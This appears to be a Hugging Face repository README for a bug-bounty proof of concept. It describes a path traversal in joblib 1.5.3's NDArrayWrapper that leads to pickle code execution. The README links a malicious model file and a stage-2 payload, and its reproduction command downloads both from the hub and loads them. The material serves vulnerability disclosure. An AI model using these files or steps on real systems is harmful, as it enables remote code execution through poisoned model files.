joblib-ndarray-poc / README.md
th3-j0k3r's picture
Add README.md
641cc65 verified
|
Raw
History Blame Contribute Delete
1.11 kB
metadata
license: mit
tags:
  - security
  - poc

joblib NDArrayWrapper Path Traversal PoC

Security research PoC for huntr MFV submission.

Vulnerability: NDArrayWrapper.read() in joblib/numpy_pickle_compat.py uses an unsanitized self.filename field (from inside the pickle) in os.path.join(), then calls numpy.load(filename, allow_pickle=True) — enabling path traversal to arbitrary pickle execution.

Affected version: joblib 1.5.3 (latest)

Files

  • evil.joblib — malicious model file (NDArrayWrapper with filename="../payload.npy")
  • payload.npy — stage-2 RCE pickle (place one directory above evil.joblib)

Reproduction

pip3 install joblib==1.5.3 numpy
python3 -c "
import os, joblib
from huggingface_hub import hf_hub_download
os.makedirs('/tmp/poc_model', exist_ok=True)
hf_hub_download('th3-j0k3r/joblib-ndarray-poc', 'payload.npy', local_dir='/tmp')
hf_hub_download('th3-j0k3r/joblib-ndarray-poc', 'evil.joblib', local_dir='/tmp/poc_model')
try: joblib.load('/tmp/poc_model/evil.joblib')
except: pass
print(open('/tmp/jl_rce_proof.txt').read().strip())
"